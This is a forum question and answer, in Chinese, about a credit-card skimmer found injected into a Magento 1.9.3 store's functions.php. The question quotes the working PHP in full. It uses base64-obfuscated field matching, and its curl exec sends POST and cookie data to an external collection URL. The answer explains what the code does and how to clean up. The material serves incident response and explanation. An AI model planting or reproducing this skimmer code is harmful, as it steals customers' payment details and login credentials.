我有一台服务器端扫描程序,扫描我的网站是否有任何恶意代码痕迹。我今天早上来看看它在app/code/core/Mage/Core/functions.php文件中报告 php.malware.magento-cc-stealer.069 。
我使用Magento 1.9.3版运行在线商店。
我浏览了这个文件并将其与干净的Magento 1.9.3 function.php文件的镜像副本进行了比较。
我发现要添加到我的文件中:
if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");
任何人都可以解释这是做什么以及它有什么后果?
据我所知,if语句的第一行表示如果数据与编码文本匹配( billing | firstname | cc_number | login | username | payment | cc _ )并且是敏感,生成值的可存储表示并发布。我虽然在第二线上挣扎。
答案 0 :(得分:2)
顾名思义,它试图窃取信用卡信息。
只要这些信用卡字段出现在POST请求中,它就会触发它,只会将它们与cookie信息以及您的服务器地址一起发送到https://magescripts.info/testServer.php(请勿点击!),这可能是另一个受害者,托管攻击者的收集脚本。注意:如果magescripts.info是你的域名,你的搜索还没有结束,你应该找到testServer.php指向的地方并删除它。